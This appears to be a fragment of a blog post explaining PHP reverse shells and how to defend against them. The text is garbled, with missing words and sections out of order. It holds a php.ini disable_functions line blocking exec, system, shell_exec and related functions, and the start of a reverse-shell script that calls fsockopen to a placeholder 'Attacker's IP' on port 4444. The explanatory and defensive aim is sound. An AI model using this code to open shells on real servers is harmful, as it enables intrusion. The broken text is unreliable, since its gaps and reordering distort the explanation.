At first glance, it looks like just another PHP script. But this small file (famously maintained by ) is one of the most widely used payloads in web application attacks.
Normally, when you connect to a remote server (like SSH or a web shell), you initiate the connection. That’s a —the server listens, and you connect.
In this post, we’ll break down what it is, how it works line by line, why attackers love it, and—most importantly—how to defend against it. Before diving into the PHP version, let’s clarify the concept.
disable_functions = exec,system,shell_exec,passthru,proc_open,pcntl_exec This stops most PHP reverse shells (but not all — fsockopen might still work). Use a firewall to block unexpected egress:
<?php set_time_limit(0); $ip = '127.0.0.1'; // Attacker's IP $port = 4444; // Attacker's port $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { die("Error: $errstr ($errno)"); }